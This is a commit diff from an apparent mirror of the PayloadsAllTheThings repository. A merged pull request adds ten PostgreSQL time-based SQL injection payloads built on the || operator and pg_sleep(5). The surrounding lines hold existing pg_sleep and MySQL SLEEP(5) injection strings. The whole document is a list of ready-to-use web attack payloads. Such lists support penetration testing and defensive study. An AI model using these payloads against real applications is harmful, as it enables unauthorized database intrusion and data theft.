mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Merge pull request #779 from florianamette/patch-1
Add support for `||` (concatenation) operator in PostgreSQL for time based SQL injection
This commit is contained in:
commit
aaf6bdf394
1 changed files with 10 additions and 0 deletions
|
|
@ -40,6 +40,16 @@ pg_sleep(5)--
|
|||
1)) or pg_sleep(5)--
|
||||
")) or pg_sleep(5)--
|
||||
')) or pg_sleep(5)--
|
||||
||pg_sleep(5)--
|
||||
1||pg_sleep(5)--
|
||||
"||pg_sleep(5)--
|
||||
'||pg_sleep(5)--
|
||||
1)||pg_sleep(5)--
|
||||
")||pg_sleep(5)--
|
||||
')||pg_sleep(5)--
|
||||
1))||pg_sleep(5)--
|
||||
"))||pg_sleep(5)--
|
||||
'))||pg_sleep(5)--
|
||||
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
|
||||
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
|
||||
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
|
||||
|
|
|
|||
Loading…
Reference in a new issue